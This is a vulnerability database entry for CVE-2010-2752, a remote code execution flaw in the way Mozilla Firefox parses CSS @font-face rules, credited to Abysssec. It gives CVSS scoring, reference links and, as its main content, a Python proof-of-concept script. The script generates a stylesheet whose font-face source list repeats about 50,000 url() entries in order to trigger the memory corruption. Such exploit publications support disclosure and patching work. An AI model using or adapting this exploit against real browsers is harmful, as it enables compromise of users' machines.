Mozilla Firefox CSS font-face Remote Code Execution Vulnerability

2010.09.30
Credit: Abysssec
Risk: High
Local: No
Remote: Yes
CWE: CWE-189


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

''' __ __ ____ _ _ ____ | \/ |/ __ \ /\ | | | | _ \ | \ / | | | | / \ | | | | |_) | | |\/| | | | |/ /\ \| | | | _ < | | | | |__| / ____ \ |__| | |_) | |_| |_|\____/_/ \_\____/|____/ http://www.exploit-db.com/moabu-15-mozilla-firefox-css-font-face-remote-code-execution-vulnerability/ http://www.exploit-db.com/sploits/moaub-25-exploit.zip ''' ''' Title : Mozilla Firefox CSS font-face Remote Code Execution Vulnerability Version : Firefox Analysis : http://www.abysssec.com Vendor : http://www.mozilla.com Impact : Crirical Contact : shahin [at] abysssec.com , info [at] abysssec.com Twitter : @abysssec CVE : CVE-2010-2752 ''' import sys; myStyle = """ @font-face { font-family: Sean; font-style: normal; font-weight: normal; src: url(SEAN1.eot); src: url('type/filename.woff') format('woff') """ i=0 while(i<50000): myStyle = myStyle + ",url('type/filename.otf') format('opentype')\n"; i=i+1 myStyle = myStyle + ",url('type/filename.otf') format('opentype');\n"; myStyle = myStyle + "}\n"; cssFile = open("style2.css","w") cssFile.write(myStyle) cssFile.close()

References:

https://bugzilla.mozilla.org/show_bug.cgi?id=574059
http://www.zerodayinitiative.com/advisories/ZDI-10-133/
http://www.securityfocus.com/bid/41852
http://www.securityfocus.com/archive/1/512514
http://www.mozilla.org/security/announce/2010/mfsa2010-39.html
http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:11680


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top